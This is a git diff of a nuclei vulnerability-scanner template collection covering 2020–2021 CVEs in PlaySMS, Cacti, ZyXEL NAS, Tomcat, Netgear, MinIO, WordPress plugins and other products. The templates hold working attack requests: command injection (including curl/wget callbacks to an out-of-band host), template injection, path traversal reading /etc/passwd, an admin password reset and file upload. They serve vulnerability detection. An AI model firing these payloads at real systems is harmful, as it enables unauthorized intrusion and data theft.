- Remote Code Execution + author: dbrwsky + severity: critical + description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. + reference: + - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ + - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 + - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html + - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-8644 + cwe-id: CWE-94 + epss-score: 0.96028 + epss-percentile: 0.99356 + cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: playsms + product: playsms + tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce + +http: + - raw: + - | + GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '4468-0202-EVC' + + - type: status + status: + - 200 + + extractors: + - type: xpath + name: csrf + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + attribute: value + part: body +# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8813.yaml b/nuclei-templates/CVE-2020/cve-2020-8813.yaml deleted file mode 100644 index d8ab5f4114..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-8813.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-8813 - -info: - name: Cacti v1.2.8 - Unauthenticated Remote Code Execution - author: gy741 - severity: high - description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability - reference: - - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - tags: cve,cve2020,cacti,rce,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2020-8813 - cwe-id: CWE-78 - -requests: - - raw: - - | - GET /graph_realtime.php?action=init HTTP/1.1 - Host: {{Hostname}} - Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2020/cve-2020-8982.yaml b/nuclei-templates/CVE-2020/cve-2020-8982.yaml new file mode 100644 index 0000000000..34b82f700e --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8982.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-8982 + +info: + name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read + author: dwisiswant0 + severity: high + description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020. + tags: cve,cve2020,citrix,lfi + reference: https://support.citrix.com/article/CTX269106 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8982 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-9043.yaml b/nuclei-templates/CVE-2020/cve-2020-9043.yaml deleted file mode 100644 index 3a4e5cdd20..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-9043.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: CVE-2020-9043 - -info: - name: WordPress wpCentral <1.5.1 - Information Disclosure - author: scent2d - severity: high - description: | - WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin. - remediation: | - Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. - reference: - - https://wpscan.com/vulnerability/10074 - - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 - - https://wordpress.org/plugins/wp-central/#developers - - https://nvd.nist.gov/vuln/detail/CVE-2020-9043 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-9043 - cwe-id: CWE-200 - epss-score: 0.04173 - epss-percentile: 0.91333 - cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* - metadata: - verified: true - max-request: 4 - vendor: wpcentral - product: wpcentral - framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/index.php HTTP/1.1 - Host: {{Hostname}} - - | - GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 - Host: {{Hostname}} - - | - GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - "contains(header_4, 'text/html')" - - "status_code_4 == 200" - - "contains(body_4, 'wpCentral Connection Key')" - - contains(body_4, "pagenow = \'dashboard\'") - condition: and - - extractors: - - type: regex - name: authkey - group: 1 - regex: - - 'style="word-wrap:break-word;">([a-z0-9]+)' - internal: true - part: body - - - type: regex - name: nonce - group: 1 - regex: - - '_wpnonce=([0-9a-z]+)' - internal: true - part: body -# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-9054.yaml b/nuclei-templates/CVE-2020/cve-2020-9054.yaml new file mode 100644 index 0000000000..e9491963f0 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-9054.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-9054 + +info: + name: ZyXEL NAS RCE + author: dhiyaneshDk + severity: critical + description: | + Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. + ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. + If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. + Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. + As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. + By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. + This may happen by directly connecting to a device if it is directly exposed to an attacker. + However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. + For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. + Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2 + reference: + - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ + - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml + tags: cve,cve2020,rce,zyxel,injection + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-9054 + cwe-id: CWE-78 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2020/cve-2020-9484.yaml b/nuclei-templates/CVE-2020/cve-2020-9484.yaml new file mode 100644 index 0000000000..3adcf4004f --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-9484.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-9484 + +info: + name: Apache Tomcat RCE by deserialization + author: dwisiswant0 + severity: high + description: | + When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if + a) an attacker is able to control the contents and name of a file on the server; and + b) the server is configured to use the PersistenceManager with a FileStore; and + c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and + d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. + Note that all of conditions a) to d) must be true for the attack to succeed. + reference: http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.00 + cve-id: CVE-2020-9484 + cwe-id: CWE-502 + tags: cve,cve2020,apache,tomcat,rce + +requests: + - method: GET + headers: + Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy" + path: + - "{{BaseURL}}/index.jsp" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: body + words: + - "Exception" + - "ObjectInputStream" + - "PersistentManagerBase" + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-9757.yaml b/nuclei-templates/CVE-2020/cve-2020-9757.yaml deleted file mode 100644 index 20bf91e5e0..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-9757.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-9757 - -info: - name: SEOmatic < 3.3.0 Server-Side Template Injection - author: dwisiswant0 - severity: high - description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller. - tags: cve,cve2020,ssti - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2020-9757 - cwe-id: CWE-74 - reference: - - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md - - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt - - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b - - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f - -requests: - - method: GET - path: - - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" - - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" - - skip-variables-check: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "MetaLinkContainer" - - "canonical" - - "22344" - condition: and - part: body diff --git a/nuclei-templates/CVE-2020/cve-20200924a(1).yaml b/nuclei-templates/CVE-2020/cve-20200924a(1).yaml index 7bfd8f9b88..2f0b34a3f6 100644 --- a/nuclei-templates/CVE-2020/cve-20200924a(1).yaml +++ b/nuclei-templates/CVE-2020/cve-20200924a(1).yaml @@ -1,4 +1,5 @@ id: CVE-20200924a + info: name: Web requests can navigate outside of DRP controlled areas - Directory traversal author: c-sh0 @@ -15,19 +16,24 @@ info: cve-id: CVE-20200924a cwe-id: CWE-22 tags: cve,cve2020,lfi,rackn,digitalrebar + requests: - method: GET path: - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header words: - 'X-Drp-Sha256sum:' + - type: regex regex: - "root:.*:0:0" + diff --git a/nuclei-templates/CVE-2021/cve-2021-1497.yaml b/nuclei-templates/CVE-2021/CVE-2021-1497.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-1497.yaml rename to nuclei-templates/CVE-2021/CVE-2021-1497.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-1499.yaml b/nuclei-templates/CVE-2021/CVE-2021-1499.yaml new file mode 100644 index 0000000000..02678b971d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-1499.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-1499 + +info: + name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability + author: gy741 + severity: medium + description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. + reference: + - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz + - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2021-1499 + cwe-id: CWE-306 + tags: cve,cve2021,cisco,fileupload,intrusive + +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 + Origin: {{RootURL}} + Referer: {{RootURL}} + + -----------------------------253855577425106594691130420583 + Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" + Content-Type: application/json + + MyPasswdNewData->/api/tomcat + + -----------------------------253855577425106594691130420583-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - '{"result":' + - '"filename:' + - '/tmp/passwd9' + condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-20031.yaml b/nuclei-templates/CVE-2021/CVE-2021-20031.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20031.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20031.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-20092.yaml b/nuclei-templates/CVE-2021/CVE-2021-20092.yaml index 7a029962c1..a84b883624 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-20092.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-20092.yaml @@ -7,15 +7,15 @@ info: description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + tags: cve,cve2021,buffalo,firmware,iot classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2021-20092 cwe-id: CWE-200 - tags: cve,cve2021,buffalo,firmware,iot requests: - raw: @@ -53,6 +53,4 @@ requests: internal: true group: 1 regex: - - 'base64\,(.*?)" border=' - -# Enhanced by mp on 2022/04/12 + - 'base64\,(.*?)" border=' \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-20114.yaml b/nuclei-templates/CVE-2021/CVE-2021-20114.yaml deleted file mode 100644 index cde8be2d51..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20114.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-20114 - -info: - name: TCExam <= 14.8.1 Sensitive Information Exposure - author: push4d - severity: high - description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. - reference: - - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true - - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 - - https://www.tenable.com/security/research/tra-2021-32 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-20114 - cwe-id: CWE-200 - tags: cve,cve2021,tcexam,disclosure,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/cache/backup/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of /cache/backup" - - "Parent Directory" - - ".sql.gz" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20124.yaml b/nuclei-templates/CVE-2021/CVE-2021-20124.yaml deleted file mode 100644 index 8bd11820ee..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20124.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-20124 - -info: - name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet - author: 0x_Akoko - severity: high - description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. - reference: - - https://www.tenable.com/security/research/tra-2021-42 - - https://www.draytek.com/products/vigorconnect/ - - https://www.cvedetails.com/cve/CVE-2021-20124 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-20124 - cwe-id: CWE-668 - metadata: - shodan-query: http.html:"VigorConnect" - verified: true - tags: cve,cve2021,draytek,lfi,vigorconnect - -requests: - - method: GET - path: - - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd" - - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "for 16-bit app support" - condition: or - - - type: word - part: header - words: - - "application/octet-stream" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-20150.yaml b/nuclei-templates/CVE-2021/CVE-2021-20150.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20150.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20150.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-20158.yaml b/nuclei-templates/CVE-2021/CVE-2021-20158.yaml deleted file mode 100644 index 2a1289ad04..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20158.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2021-20158 - -info: - name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change - author: gy741 - severity: critical - description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. - reference: - - https://www.tenable.com/security/research/tra-2021-54 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-20158 - cwe-id: CWE-287 - metadata: - shodan-query: http.html:"TEW-827DRU" - tags: cve,cve2021,trendnet,disclosure,router,intrusive - -requests: - - raw: - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - - ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - - html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - 'setConnectDevice' - - 'setInternet' - - 'setWlanSSID' - - 'TEW-827DRU' - condition: and - - - type: word - part: header - words: - - "text/html" - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20167.yaml b/nuclei-templates/CVE-2021/CVE-2021-20167.yaml deleted file mode 100644 index ab50335740..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20167.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-20167 - -info: - name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun - author: gy741 - severity: high - description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.' - reference: - - https://www.tenable.com/security/research/tra-2021-55 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20166 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20167 - remediation: Upgrade to newer release of the RAX43 firmware. - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8 - cve-id: CVE-2021-20167 - cwe-id: CWE-77 - tags: cve,cve2021,netgear,rce,router - -requests: - - raw: - - | - POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 - Host: {{Hostname}} - - "name":"';$(curl http://{{interactsh-url}});'", - "email":"a@b.c" - - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20792.yaml b/nuclei-templates/CVE-2021/CVE-2021-20792.yaml new file mode 100644 index 0000000000..8430ef6363 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-20792.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-20792 + +info: + name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors." + reference: + - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf + - https://nvd.nist.gov/vuln/detail/CVE-2021-20792 + - https://quizandsurveymaster.com/ + - https://jvn.jp/en/jp/JVN65388002/index.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-20792 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=mlw_quiz_list&s=">&paged="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-21234.yaml b/nuclei-templates/CVE-2021/CVE-2021-21234.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21234.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21234.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21287.yaml b/nuclei-templates/CVE-2021/CVE-2021-21287.yaml new file mode 100644 index 0000000000..9bf1563199 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-21287.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-21287 + +info: + name: MinIO Browser API SSRF + author: pikpikcu + severity: high + description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. + reference: + - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q + - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 + - https://github.com/minio/minio/pull/11337 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 + cve-id: CVE-2021-21287 + cwe-id: CWE-918 + tags: cve,cve2021,minio,ssrf,oast + +requests: + - raw: + - | + POST /minio/webrpc HTTP/1.1 + Host: {{interactsh-url}} + Content-Type: application/json + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Length: 76 + + {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" # Confirms the HTTP Interaction + + - type: word + words: + - "We encountered an internal error" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21389.yaml b/nuclei-templates/CVE-2021/CVE-2021-21389.yaml deleted file mode 100644 index 03a4cdb928..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21389.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2021-21389 - -info: - name: BuddyPress REST API Privilege Escalation to RCE - author: lotusdll - severity: high - description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE - reference: - - https://github.com/HoangKien1020/CVE-2021-21389 - - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/ - - https://codex.buddypress.org/releases/version-7-2-1/ - - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-21389 - cwe-id: CWE-863 - tags: cve,cve2021,wordpress,wp-plugin,rce - -requests: - - raw: - - | - POST /wp-json/buddypress/v1/signup HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - - { - "user_login":"{{randstr}}", - "password":"{{randstr}}", - "user_name":"{{randstr}}", - "user_email":"{{randstr}}@example.com" - } - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - "user_login" - - "registered" - - "activation_key" - - "user_email" - part: body - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-21479.yaml b/nuclei-templates/CVE-2021/CVE-2021-21479.yaml index e0c891203d..befe4c3526 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21479.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21479.yaml @@ -1,22 +1,19 @@ id: CVE-2021-21479 info: - name: SCIMono <0.0.19 - Remote Code Execution + name: SCIMono < v0.0.19 Remote Code Execution author: dwisiswant0 severity: critical + reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ description: | - SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and - execute java expressions and compromise the availability and integrity of the system. - reference: - - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-21479 - - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c + In SCIMono before 0.0.19, it is possible for an attacker to inject and + execute java expression compromising the availability and integrity of the system. + tags: cve,cve2021,scimono,rce classification: cvss-metrics: 